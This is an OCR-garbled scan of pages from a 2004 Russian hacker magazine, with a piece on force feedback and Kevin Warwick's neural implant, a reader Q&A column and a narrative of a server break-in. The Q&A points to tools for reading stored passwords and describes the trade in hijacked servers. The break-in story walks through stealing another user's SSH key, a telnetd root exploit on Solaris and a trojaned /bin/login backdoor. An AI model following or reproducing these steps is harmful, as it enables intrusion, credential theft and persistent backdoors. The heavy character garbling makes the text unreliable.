технологию в популярных тогда компьютер- 
ных играх. Так на компьютерный рынок вы- 
шел первый джойстик с обратной отдачей 
под названием І-Рогсе! Стоила такая вещица 
около 5 тысяч долларов и позволяла игрокам 
получить непередаваемые ощущения в таких 
играх, как Резсепі 2 и других космических и 
автосимуляторах. На деле же все было го- 
раздо прозаичнее: І-Рогсе просто создавал 
вибрацию при взрыве, выстреле или пов- 
реждении летательного средства, но по тем 
временам это было что-то невообразимое, 
ведь компьютер мог взаимодействовать с 
человеком по-новому! Многие геймеры спе- 




шили в магазины за новинкой. Примерно че- 
рез месяц к Іттегзіоп присоединилась 
Іпіегасііѵе І/О и анонсировала первый руль 
с обратной отдачей под названием Ѵігіиаі 
ѴеЬісІе. Новый джойстик обещал невиданную 
реалистичность в автосимуляторах. Компа- 
ния приобрела известность, и в мае 1 996 го- 
да ВВС США заказали фирме партию І-Рогсе 
для тренировки летчиков. Позже вышла се- 
рийная модель от фирмы СН Ргосіисіз - 
джойстик с поддержкой технологии Рогсе 
РеесІЬаск по доступной цене - $169. 

Технология начала победоносное шествие 
по планете. Потом было еще много джойсти- 
ков от разных фирм, но для нас представля- 
ет интерес новинка от Іттегзіоп: мышь с 
поддержкой обратной отдачи. Это позволяло 
почувствовать не только игры, но и офисные 
программы и даже М5 ѴѴІпбоѵѵз. Мышь соп- 
ротивлялась пользователю при перетаскива- 
нии и растягивании окна, переносе папок и 
т.п. (Зачем нужна обратная отдача при рабо- 
те с виндой? Ума не приложу - прим, ред.) 



Сейчас устройства с Рогсе РеесІЬаск очень 
распространены, разработки в этой сфере 
ведут такие фирмы, как ЬодііесЬ, АСТ-ЬаЬз и 
другие. Уже сейчас, помимо банальных 
джойстиков, можно приобрести вибростул 
и виброкресло, которые создают вибрацию 
при звучании низких частот. За 15 долларов 
можно купить наушники с отдачей, которые 
генерируют вибрации, опять же основанные 
на низких частотах. Сейчас технология Рогсе 



ЧТО ПОСМОТРЕТЬ ПО ТЕМЕ 



о. Маігіх (Матрица) 

О. СІЮ5І іп ЗИеІІ (Призрак в доспехах) 

©. Нирвана 

О. ВІасІе Виппег (Бегущий по лезвию) 

Ѳ. ЭоЬппу Мпетопіс (Джонни мнемоник) 




Руль фирмы МісгозоЙ с поддержкой обратной связи 
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ПОЧУВСТВУЙ ВПИТЫ! 



НТО почитать ПО ТЕМЕ 




о. Уильям Гибсон «Нейромантик», «Мона Лиза Овердрайв», 
«Г раф Ноль», «Джонни Мнемоник» 

Ѳ. Мерри Шелли «2048» и другие рассказы 



вживлению в левое за- 
пястье Кевина Уорвика 
кремниевого микрочипа, 
который был подключен к 
срединному нерву Кеви- 
на. Крохотный имплантат 
представлял собой ме- 
таллическую площадку 
шириной 3 миллиметра. 
Площадка была усеяна 
шипами шириной в чело- 
веческий волос, благода- 
ря чему ее благополучно 
разместили на нерве 
профессора. Каждый шип 
являлся электрическим 
контактом с отходящим 
от него проводом, все 
провода были собраны в жгут и выведены из 
руки, где располагался разъем, подключен- 
ный к браслету. К разъему подключается 
компьютер, позволяющий производить об- 
мен данными. Что это дает на практике? 

А то, что Уорвик может моделировать любые 
чувства и эмоции искусственно, подавая ко- 
манды с компьютера. Таким образом дости- 
гается 100-процентный эффект присутствия 
в любой поставленной для моделирования 
ситуации. Уорвик планирует поставить еще 
ряд экспериментов. Если они окажутся ус- 
пешными, это будет означать не только спа- 
сение многих людей с поврежденным спин- 
ным мозгом или болезнями нервной систе- 
мы, но и появление новой технологии, кото- 
рую обязательно задействуют в индустрии 
развлечений, так же как и на первый взгляд 
сугубо правительственную технологию Рогсе 
РеебЬаск. Но представим другой, не такой 
радужный, вариант развития событий. 

Л МПСІС РЕОРІЕ, 1100000 РЕ0Р1Е! 

Разработка Кевина Уорвика позволяет не 
только симулировать чувства, но и, теорити- 
чески, управлять человеком, ведь подавая 
нервам команды, можно заставить двигаться 



РеебЬаск поддерживает лишь 1 2 эффектов 
обратной связи, к тому же все они реализо- 
ваны только в РиІІ Рогсе РеебЬаск мышах. Но 
все же, Рогсе РеебЬаск не дает достаточной 
реалистичности, чтобы забыть, что ты си- 
дишь перед монитором и играешь в игру, 
а не несешься на космическом истребителе 
к туманной Альфа Центавре. Для этого нуж- 
ны более совершенные технологии... 

МПТКІХ НП8 Ѵ0ІІ 

Теоретически, более-менее правдоподобные 
ощущения ты можешь получить двумя спо- 
собами. Первый - это моделирование ситу- 
ации в комнате с симуляцией реальности с 
помощью перемещения плоскостей, исполь- 
зования искусственных источников ветра, 
взрывной волны и так далее. Такой способ 
используется в парках развлечений и, воз- 
можно, заставит человека поверить в реаль- 
ность происходящего. Есть, правда, множе- 
ство недостатков, главный из которых в том, 
что таким способом можно моделировать 
изменения местности или какие-либо при- 
родные явления, но человек не сможет ощу- 
тить отдачу от оружия, почувствовать холод 
льда или металла. Для этого подойдет вто- 
рой способ, основанный на использовании 
имплантатов. На первый взгляд он может 
показаться фантастическим, но я приведу 
веские аргументы, которые заставят тебя по- 
верить в то, что именно за этим способом 
будущее ѴіііиаІ Неаіііу. 

Ты, наверное, слышал о Кевине Уорвике, 
профессоре кибернетики, который в 1998 
году имплантировал себе крохотную капсулу, 
реагирующую на поступающие извне элект- 
ромагнитные импульсы. Установленная на 
компьютер программа, которая получала от 
имплантата сигналы о местонахождении 
Уорвика, самостоятельно включала и выклю- 
чала свет и открывала двери в помещениях, 
куда заходил профессор. Это казалось фан- 
тастикой, но на этом профессор не остано- 
вился, и его следующий эксперимент стал 
поистине революционным и еще более бе- 
зумным. 14 марта 2002 года в Оксфорде, в 
больнице Редклифф, прошла операция по 



М АТ К IX 



Матрица тоже могла физически воздействовать на 
человека, хоть и была иллюзией 



любую часть тела. Это означает, что при 
массовом распространении этой технологии 
возникнет опасность так называемого "ки- 
бергипноза”, когда один человек, получив 
доступ к системе управления имплантатом, 
сможет управлять другим. Точно так же пра- 
вительство получит возможность управлять 
населением своей страны. (Какие же тогда 
возможности появятся у хакеров? - прим, 
ред.) Знакомая картина, если ты видел 
мультик Ойозі іп ЗбеІІ или читал романы 
Гибсона, не правда ли? Другая проблема в 
том, что опыт по симулированию чувств ста- 
вился ранее на крысах и других животных. 
Крысе подключали имплантат и выводили от 
него кнопку, которая создавала чувство ра- 
дости и счастья. Крысе показывали действие 
этой кнопки, и позже она сама начинала на- 
жимать на кнопку, сначала с опаской, потом 
более смело. В конце концов она жала с ди- 
ким остервенением и умирала от нагрузки 
на нервную систему. Зачем ей что-то еще, 
когда наивысшая точка наслаждения дости- 
гается всего лишь нажатием на одну кнопку? 

Кто знает, не ждет ли подобная участь чело- 
века, которому слишком понравится симули- 
ровать чувства, не будет ли он постоянно нахо- 
диться в виртуальной реальности, пока его не 
постигнет участь той лабораторной крысы? 
Можно только догадываться, строить теории 
и надеяться, что к моменту широкого распро- 
странения этой технологии ученые придумают 
что-нибудь, что позволит снизить нагрузку или 
как-то ограничить ее. А в том, что имплантаты 
будут использоваться повсеместно, можешь 
не сомневаться. И что-то мне подсказывает, 
что это случится очень скоро... 




СІгазІ Іп ЗІіеІІ - аниме, в котором ясно показаны 
перспективы имплантатов и кибергипноза 



СПИТ КЕВИНП У0РВИКП 



У Кевина Уорвика есть свой сайт ( «ѵѵѵм.кеѵіпѵѵаг«ѵік.сот ) , но на момент 
написания статьи он не отзывался. Надеюсь, тебе повезет боль- 
ше :). 




Кевин Уорвик, первый 
человек-киборг 
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О і Дорогостоящий софт остается таким до появления публично доступ- 
■ ных кряков. Предполагаю, что это не твой случай. Для подмены МАС- 



Задавая вопросы, конкретизируй их. Давай больше данных о 
систеие, описывай абсолютно все, что ты знаешь о ней. Зто 
мне поможет ответить на твои вопросы и указать твои ошибки. 

И не стоит задавать вопросов, вроде "Как сломать т- 
сервер?" ипи вообще просить у меня "хапнвного" ІпІешеСа. Я 
все равно не дам, я жадный :). 





адреса под ѵѵіп существует универсальное решение - 5МАС (ѵм.кіссопяііі- 
іпд.пеі/атас). Обращаясь к ІѵМізИеасІМеІѵѵогкАсІсігезз функции виндовского 
Оеѵісе Эгіѵег Эеѵеіортепі КІІ (ОРК), тулза позволяет подставлять любой 
МАС-адрес, даже если производитель сетевой карточки не предусмотрел эту 
возможность. ЗМАС, правда, довольно редко обновляется, но все необходи- 
мое появилось буквально с первых билдов проги. 




П ' Накачал вареза с инета. Смотрю в архив, а там 
^ хрень какая-то: .Ьіп и .сие. Что мне делать с 
этим добром? 




Р " В нашей домашней локалке недавно поставили 
■ сервисы на местный ІВС-сервант. Зарегал ник, 
все чики-пуки, но он, зараза, оказывается не- 
зарегистрированным через некоторое время! 
Где собака порылась? 



О і Элита варезного мира любит всячески усложнять жизнь юзера, изоб- 
■ ретая все новые и новые способы паковки материала. А то, о чем ты 
говоришь, это образы для записи компактов, нечто вроде более известных 
.130. Возьмем одну из наиболее популярных зажигалок - Лего Вигпіпд ВОМ 
(иии.абеаб.сіе). Ему мы и скормим наш .сие файл для дальнейший записи на 
компакт .Ьіп’овского файла. При этом следует оставить оригинальные назва- 
ния файлов, т.к. .сие сообщает Лего определенный файл-источник (чаще 
всего .Ьіп имеет то же имя, что и .сие). Если в образе хранятся видеозапи- 
си, то они с полпинка извлекаются утилитой ѴСЭСеаг (мтсйдеаг.сот). Если 
же там лежит что-то другое (вне видеообласти), то тут на помощь приходят 
другие утилиты. Например, программа ЗШЙИ (\м.$Мі(.сот) должна уметь 
раскрывать .Ьіп файлы для дальнейшей с ними работы. На практике же она 
не очень захотела удовлетворить желания автора. Итого, метод с Него наи- 
более прост, да и обычно в Ьіп’ы кладут лишь увесистый варез (+200М), ко- 
торому как раз самое место на СЭ. Уверен, что найдутся и более стройные 
решения. Мой е-таіі всегда готов к их принятию. 




Р " Чем можно подглядеть пароли от аськи, 
■ ТгіІІіап’а, МЭИ? И подскажи что-нибудь для 
Оиііоок’а! 



О а Существует универсальное лекарство от всех твоих бед и целого ря- 
■ да других - РаззѴіеѵѵ. От чего это штуковина лечит: диалап-пароли 
(ВАЗ от всего, начиная с 95 и до 2003), все наиболее популярные инетовс- 
кие лагеры (Мігапсіа, АІМ), пароли файловых менеджеров (РАВ, Тоіаі 
Соттапсіег), всякие звонилки, Вазовский почтовик и прочая софтина. Офи- 
циальной странички у проги нет, так что новую версию ищи в разных сомни- 
тельных местах (например, ѵѵѵѵѵѵ.ппт.ги/зоЛ/раззѵіеѵѵ.гаг). 



0 і Большинство сервисов, как у известного по ОАбпеГу Ьаііатиі или 
■ ЫпгеаІ, удаляют зарегистрированные ники из системы (дропают) по 
истечении определенного времени, если ты не идентифицируешься к ним. 
При введении сервисов в действие, многие юзеры просто игнорируют но- 
вые возможности, часто даже забывая идентифицироваться к нику. Срок 
до дропа обычно 30 дней, так что логично периодически идентифициро- 
ваться. Чтобы не забывать этого делать, можно выставить следующий па- 
раметр - зегѵісез@піскзегѵ зеі кіІІ оп. Таким образом, каждый раз залезая 
на ирку, ты будешь насильно направлен на идентификацию. Написание 
команды может меняться в зависимости от настроек конкретного ігсб, так 
что сверяйся с хелпом! 




0 а Многие занимаются продажей взломанных боксов, как виндозной, так 
а и ‘піх’овой направленности. Из-за большой распространенности и 
доступности вторых, ими, соответственно, больше и торгуют. Также нема- 
лым спросом пользуются ИТ-машины (2000, 2003, ХР), т.к. они удобны в уда- 
ленном администрировании, позволяют гасить и запускать сервисы. 98 же 
машины часто раздаются на халяву для раскрутки сервиса по продаже более 
серьезных захваченных тачек. Для управления сервером обычно использует- 
ся уже упомянутый Иабтіп, однако отдельные личности предоставляют дос- 
туп и по Иетоіе Резйор. Также на захваченных машинах часто запускают до- 
полнительные сервисы: хостинг стремного контента, почтовики для спама, 
ОЭоЗ-проги, однодневные ѴРИ’ы. Многие закупают захваченные узлы оп- 
том. Цены очень сильно варьируются в зависимости от ширины канала, ге- 
ографического положения (не из всех стран пускают к разным серверам), 
системы оплаты за услугу, гарантий по сроку годности продаваемого добра. 
Плюс стоит помнить, что очень многие т.н. хакеры «кончились», когда пыта- 
лись нагреться именно на продаже акцесов к разным серверам. 
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I* 



ЭПИДЕМИЯ 

ими; иы 

ТЕБЯ ВЫЛЕЧИМ 

Боремся с различ- 
ными интернет- 
глистами в Сети. 



ТВОЙ ПОЧТОВЫЙ 
ЯЩИКВЗПОМПН! 

Іпіегпеі Ехріогег опять 
приносит нам много новых 
радостей. На это раз мож- 
но делать ЦН1. зрооііпд. 



РАСПРЕДЕЛЯЙ 

ВЫЧИСЛЕНИЯ 

Как объединить мозги 
нескольких компьюте- 
ров для решения об- 
щей задачи. 




О ' Уматываем со школой на каникулы в Суздаль. 
■ Как мне оттуда админить мой Упих-сервачок с 
нокиевской мобилы? 



О а Ряд телефонов ІЧокіа действительно работают на ЗутЫап ОЗ, кото- 
а рую можно зарядить самым разнообразным софтом, включая даже 
55б-клиентов. Вот список телефонов с ЗутЫап ОЗ: 3650/3660, 6600, 6620, 
ІЧ-Саде, 7650, 7700, 9210/9290. Для этих телефонов подойдет все тот же 
РиТТу, но уже под ЗутЫап. Официальный сайт проекта - $2рііі(у.$оіігсеІогде.пеІ. 
Из собственного опыта могу сказать, что админить что-то, пусть даже самое 
простое, с цифровой клавы - удовольствие весьма сомнительное. В этом 
случае спасет лишь клавиатура коммуникатора 9* серии. Иначе придется 
много тыкаться, набирая простые команды. 




Р " Что такое «симметричные шифры»? Чем они 
■ отличаются от шифрования «по открытому 
ключу»? 



П а В симметричной системе для шифровки и расшифровки информации 
а используется один и тот же ключ, например, пароль или инфа по от- 
печатку пальца. Конкретным примером может быть шифр Бернама или ЭЕЗ. 
Системы «открытого ключа» используют публичный ключ для шифрования, 
доступный всем. Для извлечения же инфы из зашифрованного массива ис- 
пользуется приватный ключ, известный лишь законному получателю шифро- 
ванной инфы. Примером может служить система открытых ключей РСР, ког- 
да человек выкладывает в Сеть свой РСР-ключик, чтобы ты мог зашифровать 
письмо для него. Получив зашифрованное письмо, он подключит свой при- 
ватный ключ и извлечет инфу. Часто люди пользуются целыми «ключница- 
ми», если переписываются со многими юзерами открытых ключей. 




Р " Люберецкие дали заказ на взлом ІЛМІХ- 
■ сервера. Как они сообщили, там висит сервис 
ТЕІМЁТ для взлома. Но он почему-то оказался 
на 22 порту... никак не могу приконнектиться 
туда! 

0 я Вероятность застать в инете тачку с работающим телнетом условно 
■ равна нахождению Ргопіраде’а с дырами образца 99 года или встре- 
че с динозавром на улице. То, что ты увидел на 22 порту, вероятно, вовсе 
не классический ТеІпеМ, а ззНсІ, с работой по 3562-протоколу. Чтобы вло- 
миться туда, тебе потребуется $зб-клиент. В *піх’е он имеется по умолча- 
нию - ззб. Винда же легко дополняется при помощи ЗесигеСВТ 
(шшікіуке.сот) или РиТТу (шмМагк.дгеепепй.огд.икЬдШат/рцНу). Как дальше 
пробираться к этому демону - вопрос ловкости рук или наличия правиль- 
ных мозгов... 




П . У нас в локале довольно много ламаков с уста- 
^ новленным ѴѴіп2К. Какую бы консольную прок- 
сю им проставить, чтобы педалить за их счет 
по вебу в инете? 



0 а Есть решение как раз под Мп2К. Правда, оно не было опробовано на 
а ХР. Зовется эта штуковина ДипкВизІег. Пускается она из командной 
строки винды, а сливается с іпІегпеііипкЬизІег.сот. Также прога существует и в 
*піх реализации. 




Р ' Я заколебался - винда при каждой перезагруз- 
' ке запускает всякий кал. Как мне найти эти 
проги и удалить их, чтобы больше не напря- 
гаться? 

0 а Любители геморроя будут разгребать реестр, смотреть банальную Авто- 
а загрузку, чекать разные запускатели-ежедневники. Упакованные же па- 
цаны заморачиваются прогой Стартер (ЗШег) с гпетЬегз.Іусоз.со.ик/согІезІиН, кото- 
рая имеет русский интерфейс и показывает все, что загружает винда. И не 
просто показывает, а разрешает удалить все ненужное хозяйство. Я, например, 
со Стартером наконец-то разыскал все добро, которое мне заколбасил произ- 
водитель ноутбука в Автозапуск. 




■ Хочу админить взломанную Шпих-тачилу так 

■ же, как и винду по Раатіп’у! Чего б мне 
заинсталить такого? 



О а Пример популярного решения - ѴІЧС (ѴігГиаІ Ыеіѵѵогк Сотриііпд). Это 
■ технология, позволяющая легко линковать машины под управлением 
различных осей. Так, например, можно на одну из систем залить сервер, 
другую же снабдить клиентом (ѵпсѵіеѵѵег). Сервер есть под винду, Юникс и 
Мак. Клиенты же созданы практически подо все, что можно, включая Раіт 
ОЗ, Роскеі РС и баѵа. Технология широко распространена, так что можно 
юзать несколько разных готовых решений: ПеаІѴІЧС (ѵш.геаіѵпс.сот), ТідМѴІЧС 
(ѵім.іідіііѵпс.сот). При помощи этих утилит ты сможешь удаленно управлять 
целым десктопом точно так же, как и Пабтіп’ом. 

Р.З. Если ты пользуешься КОЕ 3, то ѴІЧС будет стоять по умолчанию. 




Р " Хочу поменять МАС-адрес ноута и настольного 
■ компа. На обоих крутится винда. Однако не 
знаю, как узнать текущий МАК =(. 



0 а Проще простого. В командной строке вводишь ірсопіід /аІІ. Вывалится 
в куча информации. Ищи поле РзузісаІ асМгезз. В нем и будет прописан 
твой МАС-адрес сетевухи. 
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ы. 




взлом 



ХПКЕР/№03(63)/2004 



СМЕРТЕЛЬНЫЙ 



Ш юбому трейдеру известно, что самые свежие Ойау-эксппойты есть именно у бразильских хакеров. Причин никто не знает - так уж 
повелось. Более того, следующий взлом еще раз докажет продвинутость бразильских взломщиков. П все начиналось с простого 
фриварного хостинга... 



НОШУИЕВШИЕ ИСТОРИИ КРУПНЫХ взломов 




■ж- 

А На диске ты най- 
дешь сканер для 
8ип05, патченный 
бинарник /Ьіп/Іодіп 
и бэкдор, который 
использовал хакер. 



В один прекрасный день хакеру 
потребовалось перекачать 
с забугорья 600-мегабайтную 
базу. Он часто проводил по- 
добные операции, но на этот 
раз у него не было подходяще- 
го збеІІ-аккаунта. Точнее ска- 
зать, со всех его шеллов ско- 
рость перекачки была очень низкая. Пробле- 
му помог решить собрат по взлому. Он ска- 
зал, что, используя аккаунт на шш.гооЫеІІ.Ье, 
хакер легко может выполнить требуемую за- 
дачу. Мысль была логичной, потому как РТР- 
сервер находился недалеко от Бельгии. 



А ИЗУЧЕНИЕ ОБЪЕКТ!) 

Злоумышленник не любил регистрироваться на 
различных фриварных сайтах и заполнять поля 
в МтІ-страницах. Он просто попросил у друга 
аккаунт на бельгийском хостинге. Знакомый с 
неохотой сообщил свой пароль, т.к. знал, что 
взломщик попытается ненавязчиво поругать 
сервер. Он также знал, что все подобные по- 
пытки пресекались администратором, после 
чего учетная запись хакера удалялась. Но наш 
герой заверил корешка, что как только он выка- 
чает базу, сразу смоется с шелла. 

Успешно залогинившись на сервер, хакер 
скомандовал «идеі -Ь 

ТІр://хакер:31337@5егѵег.огд/Ьа5е.5ЦІ» и терпеливо 



стал дожидаться окончания процесса. Но, 
как говорится, дело было вечером, делать 
было нечего, поэтому ради забавы взлом- 
щик решил пощупать сервак на устойчивость 
и протестить пару-тройку эксплойтов (чего и 
опасался его знакомый). 

Спустя полчаса сетевой партизан понял, 
что так просто сервер ему не одолеть. Адми- 
ны действительно заботятся о безопасности 
сервака и регулярно патчат ядро. Тогда хаке- 
ру стало интересно, что за юзеры обитают 
на машине и каков их род деятельности. Для 
этого он набрал команду «Ііпгі -регт 644 
-пате .ЬазП Еіізіогу», особенно не надеясь 
на положительный результат. Однако инте- 
рпретатор вернул ему три пути на читабель- 
ную историю команд пользователей. С этого 
и начался увлекательный процесс взлома... 

А ШПИОНСКИЙ СЦЕНПРИЙ 

Нет, в истории команд не было ничего инте- 
ресного - сплошные вызовы редакторов и 
оболочек. Хакера заинтересовало другое. 
Суди сам: если по какой-то причине на сер- 
вере нашлись читабельные истории, то, воз- 
можно, получится поиметь акцес и ко всей 
домашней папке. После просмотра своих 
прав взломщик понял, что все фриварные 
пользователи (как и сам хакер) принадлежат 
к группе Іюзііпд. Соответственно, домашние 



каталоги также должны иметь групповой 
идентификатор Позііпд. Решив это прове- 
рить, наш герой набрал «Із -Іа /Іюте». Но он 
жестоко обломался. На этот каталог был ус- 
тановлен атрибут 700, позволяющий читать 
содержимое только суперпользователю. 
Правда, это было сделано с целью отпугнуть 
глупых скрипткиддисов - возможность прос- 
мотра прав внутренних папок была. И взлом- 
щик поспешил ею воспользоваться. 

Единственное, что требовалось хакеру - 
это наличие рабочего регі-интерпретатора. 
Вывод команды «регі -е ‘ргіпі “Іезі”'» дал 
понять, что регі функционирует нормально. 
Далее хакеру оставалось только пропарсить 
/еіс/раззѵѵсі и накатать простенький регі- 
скрипт. После этого он мог узнать права 
всех домашних папок. Итак, скрипт имел 
следующее содержание: 



ЧЕК-СКРИПТ 



М/кг/Ып/регІ 

ореп(Г,"(оІ(Іег$"): 
йіІе(<Р>) { 
сіютр: 

5у$Іет(“І5 -Іа $_ » ассезз'); 
} 

сІозе(Р): 
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ЧТО ПОМОГЛО КОКЕРУ ПРИ ВЗЛОМЕ? 



О. Несмотря на то, что администраторы гооізНеІІ.Ье позаботи- 
лись о своей безопасности, хакер стал искать лазейки для до- 
полнительных привилегий. Как видишь, он их нашел. 

О. Хакер всегда закрывает дыру, через которую попал в систе- 
му. С одной стороны это хорошо - другой хакер не поругает сис- 
тему. Но при излишней активности администратора злоумыш- 
ленник может лишиться доступа к взломанной системе. 

©. Хакер знает, что эксплойты проще всего искать на крупных 
хостингах, где вероятность пребывания еще одного хакера 
очень высока. Описанный взлом лишний раз доказывает это ут- 
верждение. 



зііе11$ 

зііеіі* іеіпеі 129* 
Тгуіп§ 129.1 _ 
Соппесіесі іо і і.а 
Езсаре сНагасіег із 



ЗипОЗ 5.6 
ѵи 

[ *** Иаггіогз 2001 *** ] 
# ісі 

иі сі= 0 < гооі ) §іс!=0< гооі ) 

» I 

Хитрый бэкдор для Зоіагіз 



Перед запуском хакер выполнил команду 
«саі /еіс/ра$зѵѵсІ|сиІ -іб -сі: » ТоІсІегз», кото- 
рая вырезала все домашние каталоги и поме- 
щала их в файл Мбегз. Далее сценарий прос- 
матривал права на каталоги и заносил ре- 
зультат вывода бинарника Із в файл ассезз. 
После всего этого взломщик вручную прос- 
мотрел документ и обнаружил... целых пять 
каталогов, доступных на групповое чтение. 

^СППСИТЕПЬНЫЙКПЮЧИК 

В первых двух папках взломщик не нашел 
ничего интересного: сплошные рбр-движки 
и МтІ-страницы. Содержимое третьего ката- 
лога очень заинтересовало хакера. Дело в 
том, что он наткнулся на домашнюю папку 
другого хакера. Как стало известно позже - 
бразильского. 

Принадлежность к Бразилии выяснилась 
после беглого чтения истории команд: чувак 
частенько подключался к какому-то шеллу 
при помощи ззб. Что-то подсказывало наше- 
му герою, что на этом серваке наглый бур- 
жуй хранит эксплойты и варезный софт. Од- 
нако способов проникновения внутрь он пока 
не знал. Более того, на сервере гооІзІіеІІ.Ье 
хранились только старые риЫіс-эксплойты и 
парочка самопальных сканеров. 

Но посмотрев содержимое каталога .ззй, 
хакер обнаружил приватный ключ, который 
в теории должен был авторизовать юзера 



Ь. 



С олярка - очень капризная операционка. Особенно это каса- 
ется совместимости софта. Даже при одинаковых платфор- 
мах (5РАРС или х86), но разных версиях, бинарники не будут 
совместимы между собой. Перед тем как скачивать и устанав- 
ливать громоздкий дсс, хакер попробовал перенести файл 
Іодіп, скомпиленный на солярке другой версии. Результат полу- 
чился печальным - логин отказался запускаться. 
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Выявление читабельных директорий 



БИНПРНИКИ В 8ЦЫ08 




на удаленном шелле. Взломщик скопировал 
ключик в свой каталог и попытался войти 
под пользователем зіап (именно такой логин 
был у буржуя). Как ни странно, у него это 
получилось ;). 

А БРПЗИПЬСКПЯ ТЕРРИТОРИЯ 

На бразильском сервере наш герой нашел 
всего два каталога: сді-Ьіп и РМосз. Их наз- 
вания говорили о том, что сервак был зато- 
чен под ѵѵеЬ-услуги. Это доказывала и таб- 
лица процессов, в которой большинство 
программ носили имя РКрсІ. В подпапках 
хакер обнаружил интересные вещи, а имен- 
но каталоги Обау и зсап. После консультации 
с другом взломщик узнал, что найденные 
эксплойты вовсю трейдятся на ІВС-каналах, 
а выложенные сканеры никогда не были 
риЫіс-софтом. 

Среди эксплойтов сетевой партизан нашел 
знаменитый 7350ІодоиІ от ТЕ50, за которым 
охотился уже несколько месяцев. Сплойт пере- 
полнял буфер в демоне Іеіпеіб ЗипОЗ, после 
чего хакер получал рутовый шелл. Эта находка 
была весьма кстати, так как у злоумышленника 
был один ІР-адрес, за которым скрывалась 
непреступная солярка. 

А ХИТРЫЙ БЭКДОР 

В ход пошел обнаруженный эксплойт. Со- 
лярке ничего не оставалось, как капитулиро- 
вать. На свежевзл оман ной тачке хакер сразу 
решил проверить ирііте. Оказалось, что со- 
лярка имела очень большой аптайм (более 
200 дней). Это говорило о стабильности сер- 
вера. Именно такая машина была нужна 
взломщику для сетевых махинаций. Теперь 
ему предстояло найти подходящий бэкдор, а 
также пропатчить дырку в сервисе Іеіпеіб. 

Бэкдор нашелся довольно быстро. Он 
состоял из одного сишника под названием 
Іодіп.с. Принцип бэкдора простой. После 
приема подключения демон ТеІпеТсі запускает 
/Ьіп/Іодіп с измененными дескрипторами 
ввода/вывода. Натуральный Іодіп переиме- 
новывается в файл /Ьіп/Іодіп2, а свежеком- 
пилированный Іодіп.с помещается на его 
место. Таким образом, после запуска под- 
дельного бинарника выжидается две секун- 
ды, а затем запускается обычный Іодіп2. За 
эти две секунды хакер должен успеть ввести 
два символа (ѵи - по умолчанию). Если пос- 
ледовательность была верной, то запускает- 
ся рутовый шелл. 

Теперь оставалось только скомпилиро- 
вать сишный файл и прописать его на пос- 
тоянное местожительство. Но возникла ма- 




л Не стоит забы- 
вать, что все 
действия хакера 
противозаконны, 
поэтому статья да- 
на лишь для озна- 
комления и органи- 
зации правильной 
защиты с твоей 
стороны. За при- 
менение материа- 
ла в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 




л Даже в случае 
нерабочего РегІ-ин- 
терпретатора хакер 
мог обойтись стан- 
дартным /Ьіп/зИ. 
Для этого надо бы- 
ло заменить стан- 
дартную функцию 
ореп командой геасі 
и слегка модифи- 
цировать синтаксис 
ѵѵііііе. Но, как гово- 
рится, на вкус и 
цвет... 
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ленькая проблема - на сервере отсутство- 
вал компилятор дсс. Взломщик решил най- 
ти хоть какой-нибудь компилер. В итоге он 
нашел его. Им оказался стандартный сс, 
расположенный в /изг/ссз. Общеизвестно, 
что солярный софт платный, и если не ку- 
пить лицензии на его использование (это 
как раз касается стандартного компилято- 
ра), то он не будет работать. Именно поэ- 
тому наш герой получил сообщение об от- 
сутствии лицензий. 

Но не все так плохо, как кажется на пер- 
вый взгляд. Существуют сайты, на которых 
можно скачать софт для соляры совершен- 
но бесплатно. Один из таких проектов - 
мшшФгееиаге.сот. Зайдя на него, хакер выб- 



рал ближайший тіггог и пакет дсс. Пакет 
дсс он слил на сервер, после чего скачан- 
ное добро установил стандартной коман- 
дой ркд абсі дсс. 



Теперь можно компилять программы. Но 
согласись, что оставлять дырявый сервис 
для других хакеров слишком опасно, поэто- 
му злоумышленник решает пропатчить сер- 
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Установленный бэкдор 
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Отсутствие рабочего компилятора 
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Знаменитый эксплойт для солярки 








СЛОВО 0 СКПНЕРПХ 





М ножество полезных сканеров, в том числе для Соляриса, ты 
можешь найти на всем известном портале Там 

же выкладываются свежие эксплойты и хакерские программы. 



Г 



НОЙДИ СВОЙ ЭКСПЛОЙТ! 



П роблема поиска эксплойтов на крупных хостингах не раз об- 
суждалась на страницах нашего журнала. Наиболее полный 
список методов ты найдешь в статье «Поиск эксплойтов» в ап- 
рельском номере Хакера за 2003 год. 



вис. Для этого он просто сливает необходи- 
мое обновление с соответствующего сайта 
(соііе.гиІіо$і.гі]/$ипо$_Іодіп.Іаг.д 2 ). В архиве содер- 
жится уже скомпилированный файл Іодіп, 
который хакер помещает в папку /Ьіп с наз- 
ванием файла Іодіп2 (чтобы не затереть 
бэкдор). Теперь система полностью подчи- 
нена взломщику. 

Л НОВПЯ ЖЕРТВП 

Хакер очень любил взламывать солярки, 
потому что они всегда отличались повы- 
шенным аптаймом, а также пониженным 
интересом со стороны других хакеров. Кро- 
ме того, к компьютеру на солярке предъяв- 
ляются невысокие требования: хватает поч- 
тового или ѵѵеб-сервера. Все эти преиму- 
щества только на руку хакеру, устанавлива- 
ющему на компьютеры софт для РРоЗ или 
других сетевых мероприятий. 

После овладения эксплойтом 
73501одои( хакер задумался о поиске но- 
вых машин с открытым телнетом. Они 
находились с помощью специальных ска- 
неров, один из которых взломщик нашел 
у бразильского хакера. Сканер проводил 
проверку больших подсетей на открытый 
23 порт и затем читал баннер с сервиса. 
Если заголовок соответствовал шаблону, 
то ІР-адрес заносился в лог. Несложно 
догадаться, что впоследствии этот файл 
просматривался хакером, и затрояненных 
солярок становилось все больше и боль- 
ше. Поэтому если ты админишь солярку, 
советую тебе либо закрыть стандартные 
сервисы, либо пропатчить их. В против- 
ном случае твоя соляра станет плацдар- 
мом для хакеров. ЗИ 
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Зіеплепз тоЬіІе представляет новую услугу 
т.ІгасЛіоп Ріпсіег & Сііу Оиісіе 



Всем известны преимущества систем глобального позиционирования (ОРЗ), однако да- 
леко не все знают, что достоинства ОРЗ можно получить, не покупая дорогостоящего и 
громоздкого оборудования. Достаточно иметь обычный мобильный телефон. 



Компания 8іетепз тоЬіІе представляет револю- 
ционную услугу на основе определения место- 
положения под названием т.ігасіюп Ріпсіег & Сііу 
Оиісіе. Что же это такое? За длинным названием 
скрывается объемный пакет услуг, способных 
превратить любой мобильный телефон в неза- 
менимого городского помощника-гида. 

Ріпсіег & Сііу Оиісіе (что переводится как "помощ- 
ник и путеводитель по городу") это удобный ме- 
ханизм получения информационно-поисковых 
услуг. Эта технология позволяет пользователям 
искать интересующие их места в городе с уче- 
том их текущего или будущего местонахожде- 
ния. Чтобы проиллюстрировать возможности 
